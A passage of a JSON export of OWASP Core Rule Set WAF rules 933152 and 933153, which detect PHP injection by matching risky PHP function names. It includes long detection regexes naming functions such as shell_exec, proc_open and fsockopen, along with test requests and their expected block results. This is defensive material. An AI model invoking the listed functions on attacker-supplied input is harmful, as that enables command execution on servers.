t|s_equal)|s(?:(?:av|iz)e|eek)|t(?:ell|runcate)|write)|n(?:ew_(?:c(?:o(?:llection|nnect)|ursor)|descriptor)|um_(?:field|row)s)|p(?:a(?:rs|ssword_chang)e|connect)|r(?:e(?:gister_taf_callback|sult)|ollback)|s(?:e(?:rver_version|t_(?:(?:ac|db_opera|edi)tion|c(?:all_timeout|lient_i(?:dentifier|nfo))|module_name|prefetch(?:_lob)?))|tatement_type)|unregister_taf_callback)|fetchinto|[gs]etbufferinglob)|tdec)|dbc_(?:autocommit|(?:binmod|data_sourc)e|c(?:lose(?:_all)?|o(?:lumn(?:privilege)?s|mmit|nnect(?:ion_string_(?:is_quoted|(?:should_)?quote))?)|ursor)|e(?:rror(?:msg)?|xec(?:ute)?)|f(?:etch_(?:array|into|object|row)|ield_(?:len|n(?:ame|um)|(?:scal|typ)e)|oreignkeys|ree_result)|gettypeinfo|longreadlen|n(?:ext_result|um_(?:field|row)s)|p(?:connect|r(?:epare|(?:imarykey|ocedure(?:column)?)s))|r(?:esult(?:_all)?|ollback)|s(?:etoption|(?:pecialcolumn|tatistic)s)|table(?:privilege)?s)|p(?:cache_(?:compile_file|get_(?:configuration|status)|i(?:nvalidate|s_script_cached)|reset)|en(?:dir|log|ssl_(?:c(?:ipher_(?:iv|key)_length|ms_(?:(?:de|en)crypt|read|sign|verify)|sr_(?:export(?:_to_file)?|get_(?:public_key|subject)|new|sign))|d(?:(?:ecryp|iges)t|h_compute_key)|e(?:ncrypt|rror_string)|(?:get_(?:c(?:ert_location|ipher_method|urve_name)|md_method)|random_pseudo_byte)s|open|p(?:bkdf2|k(?:cs(?:12_(?:export(?:_to_file)?|read)|7_(?:(?:de|en)crypt|read|sign|verify))|ey_(?:(?:deriv|fre)e|export(?:_to_file)?|get_(?:details|p(?:rivate|ublic))|new))|(?:rivate|ublic)_(?:de|en)crypt)|s(?:eal|ign|pki_(?:export(?:_challenge)?|new|verify))|verify|x509_(?:check(?:_private_key|purpose)|export(?:_to_file)?|f(?:ingerprint|ree)|parse|read|verify))))|utput_(?:add_rewrite_var|reset_rewrite_vars))|p(?:a(?:rse_(?:ini_(?:file|string)|str)|ss(?:thru|word_(?:algos|get_info|(?:needs_re)?hash|verify))|thinfo)|c(?:lose|ntl_(?:a(?:larm|sync_signals)|exec|forkx?|get(?:_last_error|priority)|rfork|s(?:etpriority|ig(?:nal(?:_(?:dispatch|get_handler))?|procmask|timedwait|waitinfo)|trerror)|unshare|w(?:ait(?:pid)?|exitstatus|if(?:continu|exit|s(?:ignal|topp))ed|(?:stop|term)sig)))|do_drivers|fsockopen|g_(?:(?:affected_row|num_(?:field|row)|option)s|c(?:ancel_query|l(?:ient_encoding|ose)|o(?:n(?:nect(?:_poll|ion_(?:busy|reset|status))?|(?:sume_inpu|ver)t)|py_(?:from|to)))|d(?:bnam|elet)e|e(?:n(?:d_copy|ter_pipeline_mode)|scape_(?:bytea|identifier|literal|string)|x(?:ecut|it_pipeline_mod)e)|f(?:etch_(?:a(?:ll(?:_columns)?|rray|ssoc)|object|r(?:esult|ow))|ield(?:_(?:is_null|n(?:ame|um)|prtlen|size|t(?:able|ype(?:_oid)?))|isnull|prtlen)|lush|ree_result)|get_(?:notify|pid|result)|(?:hos|inser)t|l(?:ast_(?:error|notice|oid)|o_(?:(?:c(?:los|reat)|writ)e|(?:ex|im)port|open|read(?:_all)?|(?:see|unlin)k|t(?:ell|runcate)))|meta_data|p(?:arameter_status|(?:connec|or)t|i(?:ng|peline_s(?:tatus|ync))|(?:repar|ut_lin)e)|query(?:_params)?|result_(?:error(?:_field)?|s(?:eek|tatus))|s(?:e(?:lect|nd_(?:(?:execut|prepar)e|query(?:_params)?)|t_(?:client_encoding|error_(?:context_visibil|verbos)ity))|ocket)|t(?:ra(?:ce|nsaction_status)|ty)|u(?:n(?:escape_bytea|trace)|pdate)|version)|hp(?:_(?:ini_(?:loaded_file|scanned_files)|(?:s(?:api_nam|trip_whitespac)|unam)e)|credits|dbg_(?:break_(?:f(?:ile|unction)|method|next)|c(?:lea|olo)r|e(?:nd_oplog|xec)|get_executable|prompt|start_oplog)|info|version)|osix_(?:e?access|ctermid|f?pathconf|get(?:_last_error|(?:cw|(?:e[gu]|[su])i)d|g(?:id|r(?:gid|nam|oups))|login|p(?:g(?:id|rp)|p?id|w(?:nam|uid))|rlimit)|i(?:nitgroups|satty)|kill|mk(?:fifo|nod)|s(?:et(?:(?:e[gu]|p?g|[su])id|rlimit)|trerror|ysconf)|t(?:imes|tyname)|uname)|r(?:eg_(?:filter|grep|last_error(?:_msg)?|match_all|quote|replace_callback(?:_array)?|split)|o(?:c_(?:(?:clos|nic|terminat)e|get_status|open)|perty_exists))|spell_(?:add_to_(?:personal|session)|c(?:heck|lear_session|onfig_(?:(?:creat|ignor|mod)e|d(?:ata|ict)_dir|(?:persona|save_rep)l|r(?:epl|untogether)))|new(?:_(?:config|personal))?|s(?:(?:ave_wordli|ugge)s|tore_replacemen)t)|utenv)|quote(?:d_printable_(?:de|en)code|meta))[\\s\\x0b]*\\(", "actions": [ { "act_name": "id", "lineno": 615, "act_quote": "no_quote", "act_arg": "933152", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 616, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 617, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 618, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 619, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 620, "act_quote": "quotes", "act_arg": "PHP Injection Attack: Medium-Risk PHP Function Name Found", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 621, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{TX.933152_MATCHED_VAR_NAME}: %{TX.933152_MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 622, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 623, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 624, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 625, "act_quote": "quotes", "act_arg": "attack-injection-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 626, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 627, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 628, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 629, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 630, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 631, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 632, "act_quote": "quotes", "act_arg": "tx.933152_matched_var=%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 633, "act_quote": "quotes", "act_arg": "tx.933152_matched_var_name=%{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 634, "act_quote": "quotes", "act_arg": "tx.php_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 635, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 614 } }, { "rule_id": "933153", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:r(?:a(?:d2deg|ndom_(?:bytes|int)|wurl(?:de|en)code)|e(?:a(?:d(?:dir|(?:gz)?file|lin(?:e(?:_(?:(?:(?:add|list|write)_histor|re(?:ad_histor|displa))y|c(?:allback_(?:handler_(?:install|remove)|read_char)|lear_history|ompletion_function)|info|on_new_line))?|k))|lpath(?:_cache_(?:get|size))?)|gister_(?:shutdown|tick)_function|s(?:ourcebundle_(?:c(?:ount|reate)|get(?:_error_(?:cod|messag)e)?|locales)|tore_e(?:rror|xception)_handler)|wind(?:dir)?)|mdir|sort)|s(?:api_windows_(?:cp_(?:conv|[gs]et|is_utf8)|(?:generate_ctrl_even|vt100_suppor)t|set_ctrl_handler)|candir|e(?:m_(?:(?:acquir|re(?:leas|mov))e|get)|ssion_(?:(?:abor|unse)t|c(?:ache_(?:expire|limiter)|reate_id)|de(?:code|stroy)|(?:encod|(?:module_)?nam|write_clos)e|g(?:c|et_cookie_params)|id|re(?:g(?:enerate_id|ister_shutdown)|set)|s(?:ave_path|et_(?:cookie_params|save_handler)|ta(?:rt|tus)))|t(?:_(?:e(?:rror|xception)_handler|include_path|time_limit)|(?:(?:raw)?cooki|local)e))|h(?:a1(?:_file)?|ell_exec|m(?:_(?:(?:at|de)tach|(?:(?:ge|pu)t|has)_var|remove(?:_var)?)|op_(?:(?:clos|(?:dele|wri)t|siz)e|open|read)))|i(?:m(?:ilar_text|plexml_(?:import_dom|load_(?:file|string)))|nh)|nmp(?:[23]_(?:get(?:next)?|(?:real_)?walk|set)|_(?:get_(?:quick_print|valueretrieval)|read_mib|set_(?:(?:(?:enum|quick)_prin|oid_output_forma)t|valueretrieval))|get(?:next)?|(?:real)?walk|set)|o(?:cket_(?:a(?:ccept|ddrinfo_(?:bind|connect|explain|lookup)|tmark)|bind|c(?:l(?:ear_error|ose)|msg_space|onnect|reate(?:_(?:listen|pair))?)|(?:ex|im)port_stream|get(?:_option|(?:peer|sock)name)|l(?:ast_error|isten)|re(?:ad|cv(?:from|msg)?)|s(?:e(?:lect|nd(?:msg|to)?|t_(?:(?:non)?block|option))|hutdown|trerror)|w(?:rite|saprotocol_info_(?:(?:ex|im)port|release)))|dium_(?:(?:ad|(?:un)?pa)d|b(?:ase642bin|in2(?:base64|hex))|c(?:ompare|rypto_(?:a(?:ead_(?:aes256gcm_(?:(?:de|en)crypt|is_available|keygen)|chacha20poly1305_(?:(?:de|en)crypt|ietf_(?:(?:de|en)crypt|keygen)|keygen)|xchacha20poly1305_ietf_(?:(?:de|en)crypt|keygen))|uth(?:_(?:keygen|verify))?)|box(?:_(?:keypair(?:_from_secretkey_and_publickey)?|open|publickey(?:_from_secretkey)?|se(?:al(?:_open)?|cretkey|ed_keypair)))?|core_ristretto255_(?:add|from_hash|is_valid_point|random|s(?:calar_(?:add|(?:complemen|inver)t|mul|negate|r(?:andom|educe)|sub)|ub))|generichash(?:_(?:final|init|keygen|update))?|k(?:df_(?:derive_from_key|keygen)|x_(?:client_session_keys|keypair|publickey|se(?:cretkey|ed_keypair|rver_session_keys)))|pwhash(?:_s(?:cryptsalsa208sha256(?:_str(?:_verify)?)?|tr(?:_(?:needs_rehash|verify))?))?|s(?:calarmult(?:_ristretto255(?:_base)?)?|ecret(?:box(?:_(?:keyg|op)en)?|stream_xchacha20poly1305_(?:(?:init_)?pu(?:ll|sh)|keygen|rekey))|horthash(?:_keygen)?|ign(?:_(?:(?:verify_)?detached|ed25519_[ps]k_to_curve25519|keypair(?:_from_secretkey_and_publickey)?|open|publickey(?:_from_secretkey)?|se(?:cretkey|ed_keypair)))?|tream(?:_(?:keygen|x(?:chacha20(?:_(?:keygen|xor(?:_ic)?))?|or)))?)))|hex2bin|increment|mem(?:cmp|zero))|undex)|p(?:l_(?:autoload(?:_(?:call|(?:extens|funct)ions|(?:un)?register))?|classes|object_(?:hash|id))|rintf)|qrt|scanf|tr(?:_(?:contains|(?:decreme|word_cou)nt|ends_with|getcsv|i(?:ncrement|replace)|pad|r(?:epeat|ot13)|s(?:huffle|plit|tarts_with))|c(?:(?:asec)?mp|oll|spn)|eam_(?:bucket_(?:(?:ap|pre)pend|make_writeable|new)|co(?:ntext_(?:create|get_(?:default|(?:option|param)s)|set_(?:default|options?|params))|py_to_stream)|filter_(?:(?:ap|pre)pend|re(?:gister|move))|get_(?:(?:(?:conten|transpor)t|(?:filt|wrapp)er)s|line|meta_data)|is(?:_local|atty)|resolve_include_path|s(?:e(?:lect|t_(?:blocking|chunk_size|(?:read|write)_buffer|timeout))|ocket_(?:(?:accep|clien)t|enable_crypto|get_name|pair|recvfrom|s(?:e(?:ndto|rver)|hutdown))|upports_lock)|wrapper_(?:re(?:gister|store)|unregister))|ftime|i(?:p(?:c?slashe|o)s|str)|n(?:at)?c(?:asec)?mp|p(?:brk|time)|r(?:chr|ev|i?pos)|s(?:pn|tr)|t(?:ok|r)|val)|ubstr_(?:co(?:mpare|unt)|replace)|ys_get(?:_temp_dir|loadavg))|t(?:anh|e(?:mpnam|st[12]|xtdomain)|i(?:dy_(?:(?:access|error|warning)_count|c(?:lean_repair|onfig_count)|diagnose|get(?:_(?:body|config|error_buffer|h(?:ead|tml(?:_ver)?)|o(?:pt_doc|utput)|r(?:elease|oot)|status)|opt)|is_x(?:ht)?ml|(?:parse|repair)_(?:file|string))|me(?:_(?:nanosleep|sleep_until)|zone_(?:(?:(?:abbreviation|identifier)s_lis|(?:(?:locat|vers)ion|transitions)_ge)t|name_(?:from_abbr|get)|o(?:ffset_get|pen))))|mpfile|oken_(?:get_all|name)|r(?:a(?:it_exists|nsliterator_(?:create(?:_(?:from_rules|inverse))?|(?:get_error_(?:cod|messag)|transliterat)e|list_ids))|igger_error))|u(?:[ak]sort|cwords|mask|n(?:i(?:qi|xtoj)d|register_tick_function)|(?:rlde|tf8_(?:de|en))code|s(?:e_soap_error_handler|leep|ort))|v(?:ar(?:_(?:dump|export)|iant_(?:a(?:bs|[dn]d)|c(?:as?t|mp)|d(?:ate_(?:from|to)_timestamp|iv)|eqv|fix|get_type|i(?:div|mp|nt)|m(?:od|ul)|n(?:eg|ot)|x?or|pow|round|s(?:et(?:_type)?|ub)))|ersion_compare|[fs]?printf)|wordwrap|xml(?:_(?:error_string|get_(?:current_(?:byte_index|(?:column|line)_number)|error_code)|parse(?:_into_struct|r_(?:create(?:_ns)?|free|[gs]et_option))?|set_(?:(?:character_data|default|e(?:lement|nd_namespace_decl|xternal_entity_ref)|(?:notation|start_namespace|unparsed_entity)_decl|processing_instruction)_handler|object))|writer_(?:end_(?:attribute|c(?:data|omment)|d(?:ocument|td(?:_(?:attlist|e(?:lement|ntity)))?)|element|pi)|f(?:lush|ull_end_element)|o(?:pen_(?:memory|uri)|utput_memory)|s(?:et_indent(?:_string)?|tart_(?:(?:attribute|element)(?:_ns)?|c(?:data|omment)|d(?:ocument|td(?:_(?:attlist|e(?:lement|ntity)))?)|pi))|text|write_(?:(?:attribute|element)(?:_ns)?|c(?:data|omment)|dtd(?:_(?:attlist|e(?:lement|ntity)))?|pi|raw)))|z(?:end_(?:c(?:all_method|reate_unterminated_string)|get_(?:current_func_name|map_ptr_last|unit_enum)|iterable(?:_legacy)?|leak_(?:bytes|variable)|(?:number_or_string|string_or_(?:object|stdclass))(?:_or_null)?|t(?:e(?:rminate_string|st_(?:(?:(?:nullable_)?array|void)_return|c(?:ompile_string|r(?:ash|eate_throwing_resource))|deprecated|f(?:ill_packed_array|unc)|is_string_marked_as_valid_utf8|(?:override_libxml_global_sta|parameter_with_attribu)te|zend_(?:call_stack_(?:get|use_all)|ini_(?:parse_u?quantity|str))))|hread_id)|version|weakmap_(?:attach|dump|remove))|ip_(?:close|entry_(?:c(?:lose|ompress(?:edsize|ionmethod))|(?:filesiz|nam)e|open|read)|open|read)|lib_(?:(?:de|en)cod|get_coding_typ)e)|ZendTestNS2_(?:ZendSubNS_)?namespaced_(?:deprecated_)?func)[\\s\\x0b]*\\(", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "PHP Injection Attack: Medium-Risk PHP Function Name Found", "logdata": "Matched Data: %{TX.0} found within %{TX.933153_MATCHED_VAR_NAME}: %{TX.933153_MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-injection-php" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-php", "platform-multi", "attack-injection-php", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-PHP", "capec/1000/152/242" ] }, "test_cases": [ { "description": "pmf + chain", "test_id": 1, "request": { "method": "GET", "uri": "/get/sodium_crypto_aead_chacha20poly1305_ietf_keygen%20%28", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933153 ] }, "malicious_patterns": [] }, { "description": "pmf + chain", "test_id": 2, "request": { "method": "GET", "uri": "/get?tidy_parse_string%28%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933153 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "tidy_parse_string%28%29" } ] }, { "description": "non-dangerous PHP functions, removed to reduce FP", "test_id": 3, "request": { "method": "GET", "uri": "/get?foo=filemtime%28%24foo%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933153 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo=filemtime%28%24foo%29" } ] }, { "description": "pmf + chain", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "zend_test_is_string_marked_as_valid_utf8(" }, "expected": { "should_block": true, "rule_ids": [ 933153 ] }, "malicious_patterns": [ { "location": "post_body", "value": "zend_test_is_string_marked_as_valid_utf8(" } ] }, { "description": "No parenthesis after keyword", "test_id": 5, "request": { "method": "GET", "uri": "/get?foo=zlib_get_coding_type", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933153 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo=zlib_get_coding_type" } ] }, { "description": "rule should not trigger when there are other words before parenthesis (`sodium_add` should not be matched)", "test_id": 6, "request": { "method": "GET", "uri": "/get?a=sodium_add_to_recipe(foo)", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933153 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=sodium_add_to_recipe(foo)" } ] }, { "description": "snippets of Eng words (like prev) should not be matched, requiring regex match with word boundaries (e.g. 933160)", "test_id": 7, "request": { "method": "GET", "uri": "/get?a=preview", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933153 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=preview" } ] }, { "description": "snippets of Eng words (like exp) should not be matched, requiring regex match with word boundaries (e.g. 933160)", "test_id": 8, "request": { "method": "GET", "uri": "/get?a=exploration", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933153 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=exploration" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 644, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:r(?:a(?:d2deg|ndom_(?:bytes|int)|wurl(?:de|en)code)|e(?:a(?:d(?:dir|(?:gz)?file|lin(?:e(?:_(?:(?:(?:add|list|write)_histor|re(?:ad_histor|displa))y|c(?:allback_(?:handler_(?:install|remove)|read_char)|lear_history|ompletion_function)|info|on_new_line))?|k))|lpath(?:_cache_(?:get|size))?)|gister_(?:shutdown|tick)_function|s(?:ourcebundle_(?:c(?:ount|reate)|get(?:_error_(?:cod|messag)e)?|locales)|tore_e(?:rror|xception)_handler)|wind(?:dir)?)|mdir|sort)|s(?:api_windows_(?:cp_(?:conv|[gs]et|is_utf8)|(?:generate_ctrl_even|vt100_suppor)t|set_ctrl_handler)|candir|e(?:m_(?:(?:acquir|re(?:leas|mov))e|get)|ssion_(?:(?:abor|unse)t|c(?:ache_(?:expire|limiter)|reate_id)|de(?:code|stroy)|(?:encod|(?:module_)?nam|write_clos)e|g(?:c|et_cookie_params)|id|re(?:g(?:enerate_id|ister_shutdown)|set)|s(?:ave_path|et_(?:cookie_params|save_handler)|ta(?:rt|tus)))|t(?:_(?:e(?:rror|xception)_handler|include_path|time_limit)|(?:(?:raw)?cooki|local)e))|h(?:a1(?:_file)?|ell_exec|m(?:_(?:(?:at|de)tach|(?:(?:ge|pu)t|has)_var|remove(?:_var)?)|op_(?:(?:clos|(?:dele|wri)t|siz)e|open|read)))|i(?:m(?:ilar_text|plexml_(?:import_dom|load_(?:file|string)))|nh)|nmp(?:[23]_(?:get(?:next)?|(?:real_)?walk|set)|_(?:get_(?:quick_print|valueretrieval)|read_mib|set_(?:(?:(?:enum|quick)_prin|oid_output_forma)t|valueretrieval))|get(?:next)?|(?:real)?walk|set)|o(?:cket_(?:a(?:ccept|ddrinfo_(?:bind|connect|explain|lookup)|tmark)|bind|c(?:l(?:ear_error|ose)|msg_space|onnect|reate(?:_(?:listen|pair))?)|(?:ex|im)port_stream|get(?:_option|(?:peer|sock)name)|l(?:ast_error|isten)|re(?:ad|cv(?:from|msg)?)|s(?:e(?:lect|nd(?:msg|to)?|t_(?:(?:non)?block|option))|hutdown|trerror)|w(?:rite|saprotocol_info_(?:(?:ex|im)port|release)))|dium_(?:(?:ad|(?:un)?pa)d|b(?:ase642bin|in2(?:base64|hex))|c(?:ompare|rypto_(?:a(?:ead_(?:aes256gcm_(?:(?:de|en)crypt|is_available|keygen)|chacha20poly1305_(?:(?:de|en)crypt|ietf_(?:(?:de|en)crypt|keygen)|keygen)|xchacha20poly1305_ietf_(?:(?:de|en)crypt|keygen))|uth(?:_(?:keygen|verify))?)|box(?:_(?:keypair(?:_from_secretkey_and_publickey)?|open|publickey(?:_from_secretkey)?|se(?:al(?:_open)?|cretkey|ed_keypair)))?|core_ristretto255_(?:add|from_hash|is_valid_point|random|s(?:calar_(?:add|(?:complemen|inver)t|mul|negate|r(?:andom|educe)|sub)|ub))|generichash(?:_(?:final|init|keygen|update))?|k(?:df_(?:derive_from_key|keygen)|x_(?:client_session_keys|keypair|publickey|se(?:cretkey|ed_keypair|rver_session_keys)))|pwhash(?:_s(?:cryptsalsa208sha256(?:_str(?:_verify)?)?|tr(?:_(?:needs_rehash|verify))?))?|s(?:calarmult(?:_ristretto255(?:_base)?)?|ecret(?:box(?:_(?:keyg|op)en)?|stream_xchacha20poly1305_(?:(?:init_)?pu(?:ll|sh)|keygen|rekey))|horthash(?:_keygen)?|ign(?:_(?:(?:verify_)?detached|ed25519_[ps]k_to_curve25519|keypair(?:_from_secretkey_and_publickey)?|open|publickey(?:_from_secretkey)?|se(?:cretkey|ed_keypair)))?|tream(?:_(?:keygen|x(?:chacha20(?:_(?:keygen|xor(?:_ic)?))?|or)))?)))|hex2bin|increment|mem(?:cmp|zero))|undex)|p(?:l_(?:autoload(?:_(?:call|(?:extens|funct)ions|(?:un)?register))?|classes|object_(?:hash|id))|rintf)|qrt|scanf|tr(?:_(?:contains|(?:decreme|word_cou)nt|ends_with|getcsv|i(?:ncrement|replace)|pad|r(?:epeat|ot13)|s(?:huffle|plit|tarts_with))|c(?:(?:asec)?mp|oll|spn)|eam_(?:bucket_(?:(?:ap|pre)pend|make_writeable|new)|co(?:ntext_(?:create|get_(?:default|(?:option|param)s)|set_(?:default|options?|params))|py_to_stream)|filter_(?:(?:ap|pre)pend|re(?:gister|move))|get_(?:(?:(?:conten|transpor)t|(?:filt|wrapp)er)s|line|meta_data)|is(?:_local|atty)|resolve_include_path|s(?:e(?:lect|t_(?:blocking|chunk_size|(?:read|write)_buffer|timeout))|ocket_(?:(?:accep|clien)t|enable_crypto|get_name|pair|recvfrom|s(?:e(?:ndto|rver)|hutdown))|upports_lock)|wrapper_(?:re(?:gister|store)|unregister))|ftime|i(?:p(?:c?slashe|o)s|str)|n(?:at)?c(?:asec)?mp|p(?:brk|time)|r(?:chr|ev|i?pos)|s(?:pn|tr)|t(?:ok|r)|val)|ubstr_(?:co(?:mpare|unt)|replace)|ys_get(?:_temp_dir|loadavg))|t(?:anh|e(?:mpnam|st[12]|xtdomain)|i(?:dy_(?:(?:access|error|warning)_count|c(?:lean_repair|onfig_count)|diagnose|get(?:_(?:body|config|error_buffer|h(?:ead|tml(?:_ver)?)|o(?:pt_doc|utput)|r(?:elease|oot)|status)|opt)|is_x(?:ht)?ml|(?:parse|repair)_(?:file|string))|me(?:_(?:nanosleep|sleep_until)|zone_(?:(?:(?:abbreviation|identifier)s_lis|(?:(?:locat|vers)ion|transitions)_ge)t|name_(?:from_abbr|get)|o(?:ffset_get|pen))))|mpfile|oken_(?:get_all|name)|r(?:a(?:it_exists|nsliterator_(?:create(?:_(?:from_rules|inverse))?|(?:get_error_(?:cod|messag)|transliterat)e|list_ids))|igger_error))|u(?:[ak]sort|cwords|mask|n(?:i(?:qi|xtoj)d|register_tick_function)|(?:rlde|tf8_(?:de|en))code|s(?:e_soap_error_handler|leep|ort))|v(?:ar(?:_(?:dump|export)|iant_(?:a(?:bs|[dn]d)|c(?:as?t|mp)|d(?:ate_(?:from|to)_timestamp|iv)|eqv|fix|get_type|i(?:div|mp|nt)|m(?:od|ul)|n(?:eg|ot)|x?or|pow|round|s(?:et(?:_type)?|ub)))|ersion_compare|[fs]?printf)|wordwrap|xml(?:_(?:error_string|get_(?:current_(?:byte_index|(?:column|line)_number)|error_code)|parse(?:_into_struct|r_(?:create(?:_ns)?|free|[gs]et_option))?|set_(?:(?:character_data|default|e(?:lement|nd_namespace_decl|xternal_entity_ref)|(?:notation|start_namespace|unparsed_entity)_decl|processing_instruction)_handler|object))|writer_(?:end_(?:attribute|c(?:data|omment)|d(?:ocument|td(?:_(?:attlist|e(?:lement|ntity)))?)|element|pi)|f(?:lush|ull_end_element)|o(?:pen_(?:memory|uri)|utput_memory)|s(?:et_indent(?:_string)?|tart_(?:(?:attribute|element)(?:_ns)?|c(?:data|omment)|d(?:ocument|td(?:_(?:attlist|e(?:lement|ntity)))?)|pi))|text|write_(?:(?:attribute|element)(?:_ns)?|c(?:data|omment)|dtd(?:_(?:attlist|e(?:lement|ntity)))?|pi|raw)))|z(?:end_(?:c(?:all_method|reate_unterminated_string)|get_(?:current_func_name|map_ptr_last|unit_enum)|iterable(?:_legacy)?|leak_(?:bytes|variable)|(?:number_or_string|string_or_(?:object|stdclass))(?:_or_null)?|t(?:e(?:rminate_string|st_(?:(?:(?:nullable_)?array|void)_return|c(?:ompile_string|r(?:ash|eate_throwing_resource))|deprecated|f(?:ill_p